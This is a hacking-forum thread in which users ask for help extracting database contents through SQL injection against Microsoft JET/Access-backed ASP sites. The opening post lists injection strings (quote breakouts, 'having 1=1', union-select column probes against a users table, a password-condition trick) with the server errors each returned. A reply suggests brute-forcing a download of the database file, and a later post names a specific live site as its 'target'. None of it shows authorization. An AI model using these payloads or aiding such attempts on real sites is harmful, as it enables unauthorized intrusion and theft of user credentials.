Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Jet Database Injection
Posted by: Heraclites
Date: August 04, 2009 05:58PM

Hey, I REALLY need help.

I need to get the contents of a database.

Here is some information ( I hope they are enough,I can give more though. I MUST succeed at all costs you know :) )

here is what i run and the errors i get

URL:process=activation&user='

ERROR:Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'username=''''.

/index.asp, line 299
COMMENT:why there are so many ''s at the end?


URL:process=activation&user=' having 1=1 OR '0
ERROR:HAVING clause (1=1 Or Not '0'=0) without grouping or aggregation.
COMMENT:I can't make it work without OR '0 at the end.

I guess the query is something like that
select * from table where user = $username and '0'='0'
but im a newbie.

URL: process=activation&user=-1' union select 0,0,0,0,0,0,0,0 from [users]
ERROR:Cannot update. Database or object is read-only.
COMMENT:I dont want to update. I just want to list them out...

URL:process=activation&user=-1' union select 0,0,0,0,0,0,1,0 from [users]
ERROR:no error. output = this user can not be found.
COMMENT:it's all about the 7.th parameter. When I change it something different from 1 then I get an error.The other parameters dont make no change.(What is so special about that 7.th parameter, it didnt make me ANY sense ???)

URL:process=activation&user=heraclit' and password = 'mypassword' and not '0
ERROR:no error.when i write my password right, it finds me.when i write it wrong, it doesnt. and the last condition is for omitting the next check it becomes like this.(username =$user and password = $password and not not '0' = '0')
COMMENT:So I know this previous query gets my password.I just dont know how to access it.This page is asp. I tried vbscript and javascript but .. I didnt manage it


I know the first row is "id" and I know there are "name","username","password" and "id" rows in the table.

However I cant do anything, I am REALLY in need of your help. I've been trying to hack this like 1 week and all my days are going to this. :) Thanks

Options: ReplyQuote
Re: Jet Database Injection
Posted by: Chuks
Date: August 20, 2009 05:44AM

MSAccess injection may become a headache sometimes, maybe u shud try bruteforce and see if u will be able to download the MSaccess file itself from the site.

Options: ReplyQuote
Re: Jet Database Injection
Posted by: mpour
Date: May 02, 2012 06:15AM

I've a problem with Microsoft JET Database. in below target , each command that i insert i get same error.
I REALLY need help.

i get crazyyyy!!!

target : http://www.farslabour.ir/news_item.asp?NewsID=1155

error:

Microsoft JET Database Engine error '80040e14'

Syntax error (missing operator) in query expression 'tblNews.News_ID ='.

/news/news_iteminc.asp, line 44

Options: ReplyQuote


Sorry, only registered users may post in this forum.